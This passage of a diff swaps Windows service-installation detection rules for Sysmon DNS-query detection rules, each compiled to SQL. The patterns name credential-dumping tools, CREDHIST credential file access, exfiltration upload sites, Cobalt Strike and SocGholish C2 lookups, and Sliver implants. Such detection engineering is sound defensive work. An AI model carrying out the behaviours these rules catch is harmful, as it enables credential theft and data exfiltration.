'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "win_system_susp_dhcp_config_failed.yml" + "filename": "file_access_win_susp_cred_hist_access.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - System", - "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "AppX Package Installation Attempts Via AppInstaller", + "id": "7cff77e1-9663-46a3-8260-17f2e1aa9d0a", + "status": "test", + "description": "AppInstaller.exe is spawned by the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.DesktopAppInstaller\\_%' ESCAPE '\\' AND Image LIKE '%\\\\AppInstaller.exe' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_var_services.yml" + "filename": "dns_query_win_lolbin_appinstaller.yml" }, { - "title": "Service Installation in Suspicious Folder", - "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "title": "DNS Query Tor Onion Address - Sysmon", + "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", "status": "experimental", - "description": "Detects service installation in suspicious folder appdata", - "author": "pH-T (Nextron Systems)", + "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_tor_onion.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Regsvr32 Network Activity - DNS", + "id": "36e037c4-c228-4866-b6a3-48eb292b9955", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.execution", - "attack.t1569.002" + "attack.t1559.001", + "attack.defense_evasion", + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_regsvr32_network_activity.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "title": "DNS Query for MEGA.io Upload Domain - Sysmon", + "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unlikely" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_mega_nz.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "DNS HybridConnectionManager Service Bus", + "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unlikely" + "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "Potential SocGholish Second Stage C2 DNS Query", + "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", + "author": "Dusty Miller", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query for Anonfiles.com Domain - Sysmon", + "id": "065cceea-77ec-4030-9052-fc0affea7110", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Rare legitimate access to anonfiles.com" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the tool" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", + "status": "experimental", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" - ], - "filename": "win_system_vul_cve_2020_1472.yml" - }, - { - "title": "Volume Shadow Copy Mount", - "id": "f512acbf-e662-4903-843e-97ce4652b740", - "status": "test", - "description": "Detects volume shadow copy mount via windows event log", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ], - "falsepositives": [ - "Legitimate use of volume shadow copy mounts (backups maybe)." - ], - "level": "low", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Ntfs' AND EventID = '98' AND DeviceName LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE 